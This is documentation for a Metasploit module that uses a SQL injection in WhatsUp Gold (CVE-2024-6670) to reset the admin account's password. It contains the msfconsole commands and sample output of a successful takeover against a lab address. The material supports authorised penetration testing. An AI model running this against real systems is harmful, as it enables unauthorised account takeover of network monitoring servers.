documentation/modules/auxiliary/admin/http/whatsup_gold_sqli.md
This module exploits a SQL injection vulnerability in WhatsUp Gold < v24.0.0 (CVE-2024-6670), by changing the password of an existing user
(such as of the default admin account) to an attacker-controlled one.
The software can be obtained from the vendor.
Installation instructions are available here.
Successfully tested on
msfconsole and run the following commands:msf > use auxiliary/admin/http/whatsup_gold_sqli
msf auxiliary(admin/http/whatsup_gold_sqli) > set RHOSTS <IP>
msf auxiliary(admin/http/whatsup_gold_sqli) > run
This should update the password of the default admin account.
The user of which to update the password (default: admin)
The new password for the user
Running the exploit against WhatsUp Gold v23.1.3 on Windows 22H2 should result in an output similar to the following:
msf auxiliary(admin/http/whatsup_gold_sqli) > run
[*] Running module against 192.168.217.143
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 23.1.3
[+] New password for admin was successfully set:
admin:SzESLHhWxKyf
[+] Login at: https://192.168.217.143/NmConsole/#home
[*] Auxiliary module execution completed